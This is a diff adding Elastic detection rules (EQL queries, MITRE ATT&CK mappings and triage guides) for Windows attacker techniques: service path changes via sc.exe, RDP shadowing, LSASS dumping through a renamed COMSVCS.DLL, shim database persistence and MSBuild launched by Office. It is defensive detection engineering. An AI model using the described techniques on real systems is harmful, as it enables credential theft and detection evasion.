"process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c55badd3-3e61-4292-836f-56209dc8a601", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c55badd3-3e61-4292-836f-56209dc8a601_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json new file mode 100644 index 00000000000..ac282e8c74b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to modify a service path setting using sc.exe. Attackers may attempt to modify existing services for persistence or privilege escalation.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Service Path Modification via sc.exe", + "query": "process where event.type == \"start\" and process.name : \"sc.exe\" and\n process.args : \"*config*\" and process.args : \"*binPath*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c5677997-f75b-4cda-b830-a75920514096", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c5677997-f75b-4cda-b830-a75920514096_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json new file mode 100644 index 00000000000..74800b2e190 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Shadowing Activity", + "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where host.os.type == \"windows\" and\n(\n (event.category == \"registry\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n )\n ) or\n (event.category == \"process\" and event.type == \"start\" and\n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n)\n", + "references": [ + "https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing", + "https://swarm.ptsecurity.com/remote-desktop-services-shadowing/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c57f8579-e2a5-4804-847f-f2732edc5156_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json new file mode 100644 index 00000000000..4f2c3b8db69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Renamed COM+ Services DLL", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Renamed COM+ Services DLL\n\nCOMSVCS.DLL is a Windows library that exports the MiniDump function, which can be used to dump a process memory. Adversaries may attempt to dump LSASS memory using a renamed COMSVCS.DLL to bypass command-line based detection and gain unauthorized access to credentials.\n\nThis rule identifies suspicious instances of rundll32.exe loading a renamed COMSVCS.DLL image, which can indicate potential abuse of the MiniDump function for credential theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Identify the process that created the DLL using file creation events.\n - Inspect the file for useful metadata, such as file size and creation or modification time.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and DLL using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- False positives may include legitimate instances of rundll32.exe loading a renamed COMSVCS.DLL image for non-malicious purposes, such as during software development, testing, or troubleshooting.\n\n### Related Rules\n\n- Potential Credential Access via LSASS Memory Dump - 9960432d-9b26-409f-972b-839a959e79e2\n- Suspicious Module Loaded by LSASS - 3a6001a0-0939-4bbe-86f4-47d8faeb7b97\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- LSASS Process Access via Windows API - ff4599cb-409f-4910-a239-52e4e6f532ff\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Implement Elastic Endpoint Security to detect and prevent further post exploitation activities in the environment.\n - Contain the affected system by isolating it from the network to prevent further spread of the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.category == \"process\" and\n process.name : \"rundll32.exe\"]\n [process where host.os.type == \"windows\" and event.category == \"process\" and event.dataset : \"windows.sysmon_operational\" and event.code == \"7\" and\n (file.pe.original_file_name : \"COMSVCS.DLL\" or file.pe.imphash : \"EADBCCBB324829ACB5F2BBE87E5549A8\") and\n /* renamed COMSVCS */\n not file.name : \"COMSVCS.DLL\"]\n", + "references": [ + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef", + "setup": "## Setup\n\nYou will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json new file mode 100644 index 00000000000..88108809ede --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Custom Shim Databases", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\" and \n not process.executable : \n (\"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\swrepository\\\\1\\\\swuploads\\\\SAP-SLC\\\\SAPSetupSLC02_14-80001954\\\\Setup\\\\NwSapSetup.exe\", \n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupPlatform.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SAPsetup\\\\setup\\\\NwSapSetup.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SapSetup\\\\OnRebootSvc\\\\NWSAPSetupOnRebootInstSvc.exe\", \n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\Kaspersky Security for Windows Server\\\\kavfs.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json new file mode 100644 index 00000000000..66f3d252d1c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Custom Shim Databases", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\" and \n not process.executable : \n (\"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\swrepository\\\\1\\\\swuploads\\\\SAP-SLC\\\\SAPSetupSLC02_14-80001954\\\\Setup\\\\NwSapSetup.exe\", \n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupPlatform.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SAPsetup\\\\setup\\\\NwSapSetup.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SapSetup\\\\OnRebootSvc\\\\NWSAPSetupOnRebootInstSvc.exe\", \n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\Kaspersky Security for Windows Server\\\\kavfs.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json new file mode 100644 index 00000000000..eb9904a12aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. It is quite unusual for this program to be started by an Office application like Word or Excel." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by an Office Application", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json new file mode 100644 index 00000000000..7a0084b5127 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. It is quite unusual for this program to be started by an Office application like Word or Excel." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by an Office Application", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task 